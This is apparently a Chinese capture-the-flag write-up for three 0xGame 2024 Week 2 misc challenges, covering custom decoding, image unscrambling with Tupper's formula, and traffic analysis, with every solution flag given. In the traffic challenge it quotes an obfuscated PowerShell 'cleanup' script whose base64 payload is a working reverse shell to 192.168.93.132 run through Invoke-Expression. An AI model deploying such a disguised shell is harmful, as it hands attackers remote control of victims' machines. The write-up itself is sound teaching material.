0xGame 2024-Week 2-Misc方向WP

我叫曼波

#encode：
import random
import base64
​
flag = "0xGame{This_is_a_fake_flag}"
​
def real_real_real_random():
    random_num = random.randint(1,1000)
    return str(random_num)
​
def RC4(plain,K):
    S = [0] * 256
    T = [0] * 256
    for i in range(0,256): 
        S[i] = i
        T[i] = K[i % len(K)]
​
    j = 0
    for i in range(0,256): 
        j = (j + S[i] + ord(T[i])) % 256
        S[i], S[j] = S[j], S[i]
​
    i = 0
    j = 0
    
    cipher = []
    for s in plain:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        k = S[t]
        cipher.append(chr(ord(s) ^ k))
​
    return (base64.b64encode("".join(cipher).encode())).decode()
​
def base3(s):
    base3_s = ""
    for i in s:
        dec_value = ord(i)
        base3_c = ""
        while dec_value > 0:
            base3_c += str(dec_value % 3)
            dec_value = dec_value // 3
        base3_c = base3_c[::-1].rjust(5,"0")
        base3_s += base3_c
    return (base3_s)
​
def manbo_encode(base3_s):
    manbo_dict = {"0":"曼波","1":"哦耶","2":"哇嗷"}
    manbo_text = ""
    for i in base3_s:
        manbo_text += manbo_dict[i]
    return manbo_text
​
def encode(i):
    flag_part = flag[i*2:i*2+2]
    a = real_real_real_random()
    b = RC4(flag_part,a)
    c = base3(b)
    d = manbo_encode(c)
    return a,d  key:a  ciphertext:d

#decode：
import base64
from pwn import *
p = remote("47.98.178.117",1111)
def manbo_decode(cipher):
    manbo_dict = {"曼波":"0","哦耶":"1","哇嗷":"2"}
    manbo_text = ""
    for i in range(0,len(cipher),2):
        manbo_text += manbo_dict[cipher[i:i+2]]
    return manbo_text
​
def base3_decode(s):
    base3_plain = ""
    base3_cipher=[]
    for i in range(0,len(s),5):
        base3_cipher.append(s[i:i+5])
    for i in range(len(base3_cipher)):
        cipher=base3_cipher[i]
        plain=0
        for i in range(len(cipher)):
            plain += int(cipher[i])*3**(4-i)
        base3_plain += chr(plain)
    return base3_plain
def RC4_decrypt(cipher, K):
    对密文进行 Base64 解码
    cipher = base64.b64decode(cipher).decode()
​
    初始化 S 和 T
    S = [0] * 256
    T = [0] * 256
    for i in range(256):
        S[i] = i
        T[i] = K[i % len(K)]
​
    使用密钥 K 打乱 S 数组
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(T[i])) % 256
        S[i], S[j] = S[j], S[i]
​
    生成密钥流并解密密文
    i = 0
    j = 0
    plain = []
    for c in cipher:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        k = S[t]
        plain.append(chr(ord(c) ^ k))
​
    return "".join(plain)
ques=p.recvuntil(b'>')
flag=""
while(1):
    try:
        p.sendline(b'1')
        ques=p.recvuntil(b'>')
        p.sendline(b'2')
        ques=p.recvuntil(b'>')
        key=re.search(r'(\d.*?)P',bytes.decode(ques).replace(' ','').replace('\n','')).group(1)
        p.sendline(b'3')
        ques=p.recvuntil(b'>')
        cipher=re.search(r'(.*?)P',bytes.decode(ques).replace(' ','').replace('\n','')).group(1)
        a=manbo_decode(cipher)
        b=base3_decode(a)
        c=RC4_decrypt(b,key)
        flag += c
        print(flag)
    except:
        exit(0)

flag为

0xGame{OH_yEah_Wow_Duang_HajiMi_u_MADE_it!_and_MaY_5e_Y0u_hAv4_HeArD_7he_ST0ry_0f_Gu_Gao_MaN_B0}

报告哈基米

首先zsteg一下，发现多余数据和lsb隐写

看到了a，b的值，直接想到了猫脸变换

from PIL import Image
​
img = Image.open('mijiha.png')
if img.mode == "P":
    img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
​
st = 1
a = 35
b = 7
for _ in range(st):
    with Image.new(img.mode, dim) as canvas:
        for nx in range(img.size[0]):
            for ny in range(img.size[0]):
                y = (ny - nx * a) % width
                x = (nx - y * b) % height
                canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('result.png')

解密后可以得到flag的前半段

将多余的IDAT块的内容提取出来，并进行倒置，以一个字节为整体，可以得到新的压缩包，解压后得到mijiha.txt内容如下

?reppuT sihT sI
2526565031717334081355849302824518400002066054780560033875031426082285618693525319794798626066006125490363219506086284195590452459190680646206136430850230509326192863922658924373311369100100099532515379974605057083065159988318523088554342510823923801250157027140252790785117812414283997607047894726844336402237327944299070706739459672938738683171995926543691983512367190948019577689694975313311316787244413406201168210658030717811912751907802312004909911805602609847391116950248882484065492329404895296665244558410377999740959307786584149849

很容易看出其是倒置的，利用tupper公式解密

import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
​
​
def Tupper_self_referential_formula(k):
    aa = np.zeros((17, 106))
​
    def f(x, y):
        y += k
        a1 = 2 ** -(-17 * x - y % 17)
        a2 = (y // 17) // a1
        return 1 if a2 % 2 > 0.5 else 0
​
    for y in range(17):
        for x in range(106):
            aa[y, x] = f(x, y)
    return aa[:, ::-1]
​
​
k = 9489414856877039590479997730148554425666925984049232945604842888420596111937489062065081199094002132087091572191187170308560128611026043144427876131133135794969867759108490917632153891963456295991713868378392769549376070709924497237322046334486274987407067993824142187115870972520417207510521083293280152434558803258138899515603807505064799735152359900010019631133734298562293682916239050320580346316026460860919542540955914826806059123630945216006606268974979135253968165822806241305783300650874506602000048154282039485531804337171305656252  输入你要提取的k
aa = Tupper_self_referential_formula(k)
plt.figure(figsize=(15, 10))
plt.imshow(aa, origin='lower')
plt.savefig("tupper.png")
img = Image.open('tupper.png')
翻转
dst1 = img.transpose(Image.FLIP_LEFT_RIGHT).rotate(180)
plt.imshow(dst1)
plt.show()
​
打开PNG文件
img = Image.open("tupper.png")
​
倒置图像
flipped_img = img.transpose(Image.FLIP_LEFT_RIGHT)
​
保存倒置后的图像
flipped_img.save("output.png")

解密后得到flag的后半段

flag为 0xGame{hajimi_i5_Cute_r1ght?}

呜呜呜~我再也不敢乱点了

题目给了一个流量包，和一个日志文件

打开流量包发现其为TLS流量

将日志文件导入可以恢复一些http流量

筛选http流量

可以发现压缩包wuyu.zip，将压缩包导出来得到

introduction.txt内容如下

《物语系列》是由日本轻小说作家西尾维新创作、中国台湾插画家VOFAN（本名戴源亨）负责插画的轻小说系列，分为First Season、Second Season、Final Season、Off Season和Monster Season五季。
作品以21世纪初的日本直江津镇为舞台，描述一名高中少年阿良良木历与少女们遇到许多日本民间传说的怪谭故事。本作品跟一般怪谭故事不同，不以击退妖怪或寻找事发原因之类的解谜作为主线。作品主要透过对话，为男主角和少女们之间的内心作深刻描写。西尾维新以其特有的“话痨”风格，将大量的对话和心理描写穿插到主线事件中，同时还加入了许多后设以及对社会和其他作品的讽刺。故事之中既有恋爱喜剧，又有热血的动作描写，可见作者把想要的东西都写进作品中去。所以，作者将“物语系列”自评本作为他的自信作，亦称之为“以很难媒体化为目的而写的小说”。

introduction.txt_目录下的clean_file_rubbish.ps1文件中可以发现

just some unordered and garbled characters
$Cx99zNP0yc8btz1DgdjQ4d6Or1WXvNo8ujcqwFC3kgHFE9zERLRSUflsWbCwFagZeNLAt8td0BUZr85MNnhsIJtjt4781b120rrHzFZmMsUAPcAS4tHCiJx9Vst4SWWeSBn8IkFD6e4O6bMfzboKxPZiplfSpAXYD1iHJbuWsDciLYdqfa9TcbYHOWxeR91cFzmnKRYSFU573fAKQqZMCsiaLB2ZMGMlIbshBlb94PHljepzqNuqEo2uRQ0Pg4hLsKE7D4cXoCXuDAUwHPVQm3Jz6KQcfUWAlvGzhQKyzLBXGta8LH6Ua0yL8nFCPU4O3uIh58sIpSPEdxO4HkYZfKSF9ta6hrN2o8YWfbRMIdMHNNgywFv3YVlCzwKWP3suJq7yHHl0O0MW7dtk2t05bteVH0k4O0HOfKLQ4wDPrnwu5Q1d7L6JLvNEC9dAtXx56ACbzCHQMt8ZIaxZeLxWMnB7Q34pe0bmoO1hPZtiRENA4Scp1Gsm = "JExIT1NUID0gIjE5Mi4xNjguOTMuMTMyIjsgJExQT1JUID0gMjMzMzsgJFRDUENsaWVudCA9IE5ldy1PYmplY3QgTmV0LlNvY2tldHMuVENQQ2xpZW50KCRMSE9TVCwgJExQT1JUKTsgJE5ldHdvcmtTdHJlYW0gPSAkVENQQ2xpZW50LkdldFN0cmVhbSgpOyAkU3RyZWFtUmVhZGVyID0gTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoJE5ldHdvcmtTdHJlYW0pOyAkU3RyZWFtV3JpdGVyID0gTmV3LU9iamVjdCBJTy5TdHJlYW1Xcml0ZXIoJE5ldHdvcmtTdHJlYW0pOyAkU3RyZWFtV3JpdGVyLkF1dG9GbHVzaCA9ICR0cnVlOyAkQnVmZmVyID0gTmV3LU9iamVjdCBTeXN0ZW0uQnl0ZVtdIDEwMjQ7IHdoaWxlICgkVENQQ2xpZW50LkNvbm5lY3RlZCkgeyB3aGlsZSAoJE5ldHdvcmtTdHJlYW0uRGF0YUF2YWlsYWJsZSkgeyAkUmF3RGF0YSA9ICROZXR3b3JrU3RyZWFtLlJlYWQoJEJ1ZmZlciwgMCwgJEJ1ZmZlci5MZW5ndGgpOyAkQ29kZSA9IChbdGV4dC5lbmNvZGluZ106OlVURjgpLkdldFN0cmluZygkQnVmZmVyLCAwLCAkUmF3RGF0YSAtMSkgfTsgaWYgKCRUQ1BDbGllbnQuQ29ubmVjdGVkIC1hbmQgJENvZGUuTGVuZ3RoIC1ndCAxKSB7ICRPdXRwdXQgPSB0cnkgeyBJbnZva2UtRXhwcmVzc2lvbiAoJENvZGUpIDI+JjEgfSBjYXRjaCB7ICRfIH07ICRTdHJlYW1Xcml0ZXIuV3JpdGUoIiRPdXRwdXRgbiIpOyAkQ29kZSA9ICRudWxsIH0gfTsgJFRDUENsaWVudC5DbG9zZSgpOyAkTmV0d29ya1N0cmVhbS5DbG9zZSgpOyAkU3RyZWFtUmVhZGVyLkNsb3NlKCk7ICRTdHJlYW1Xcml0ZXIuQ2xvc2UoKQ=="
​
Don't think too much
$SsuhfRO1wgyokMOlaEmBBcAzcInXG54WdHo9eVpNI9Xhb0kluCXXz5hxYS7pzUgJOfnpV8ZkPMhHNCtTMkSg1Sj32zonCoq4qXXfBsmASttQtGic0mBErHBYS6ROmJohHmnHTYa2ijVwYv8vfzgFLW6rPkY1LpsEVrbfCqc6QFCdo3mzQIkyU1pbPKuH2IDPbkYshWZYoiLxtYBdsGa6ZtvZ8WpbYhmHEcXG4RGhhoLPTnTITmSZJ7rm24GYws75qN4ZOH4Wf9IBSHuRLtOmGVi23anihNphBV8IkTmT6vhChsJwC6HY1zTN4lbA4wmdtEjhSyEF3pY2XLm8RTzIZAkoAiKvzD7V1rLdMa5nUo0c2eDe9wpnJ1qWhOy1GuVYMFI09bVegrdWHlQ4np4GWDAlc8FJhzM6gzRHwbklJmLtPcwm1MFf0vlh9lLqLpMdS586AnnBMuJezW6Tpmta4O5HaDxLsb3S8l3wTxCjoad1BdqAoZa1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Cx99zNP0yc8btz1DgdjQ4d6Or1WXvNo8ujcqwFC3kgHFE9zERLRSUflsWbCwFagZeNLAt8td0BUZr85MNnhsIJtjt4781b120rrHzFZmMsUAPcAS4tHCiJx9Vst4SWWeSBn8IkFD6e4O6bMfzboKxPZiplfSpAXYD1iHJbuWsDciLYdqfa9TcbYHOWxeR91cFzmnKRYSFU573fAKQqZMCsiaLB2ZMGMlIbshBlb94PHljepzqNuqEo2uRQ0Pg4hLsKE7D4cXoCXuDAUwHPVQm3Jz6KQcfUWAlvGzhQKyzLBXGta8LH6Ua0yL8nFCPU4O3uIh58sIpSPEdxO4HkYZfKSF9ta6hrN2o8YWfbRMIdMHNNgywFv3YVlCzwKWP3suJq7yHHl0O0MW7dtk2t05bteVH0k4O0HOfKLQ4wDPrnwu5Q1d7L6JLvNEC9dAtXx56ACbzCHQMt8ZIaxZeLxWMnB7Q34pe0bmoO1hPZtiRENA4Scp1Gsm))
​
If you don’t believe it, you can try it
Invoke-Expression $SsuhfRO1wgyokMOlaEmBBcAzcInXG54WdHo9eVpNI9Xhb0kluCXXz5hxYS7pzUgJOfnpV8ZkPMhHNCtTMkSg1Sj32zonCoq4qXXfBsmASttQtGic0mBErHBYS6ROmJohHmnHTYa2ijVwYv8vfzgFLW6rPkY1LpsEVrbfCqc6QFCdo3mzQIkyU1pbPKuH2IDPbkYshWZYoiLxtYBdsGa6ZtvZ8WpbYhmHEcXG4RGhhoLPTnTITmSZJ7rm24GYws75qN4ZOH4Wf9IBSHuRLtOmGVi23anihNphBV8IkTmT6vhChsJwC6HY1zTN4lbA4wmdtEjhSyEF3pY2XLm8RTzIZAkoAiKvzD7V1rLdMa5nUo0c2eDe9wpnJ1qWhOy1GuVYMFI09bVegrdWHlQ4np4GWDAlc8FJhzM6gzRHwbklJmLtPcwm1MFf0vlh9lLqLpMdS586AnnBMuJezW6Tpmta4O5HaDxLsb3S8l3wTxCjoad1BdqAoZa1

base64解码后发现ip：192.168.93.132

flag为 0xGame{63e1de9c00fd0dccda8a2d76475ac44a}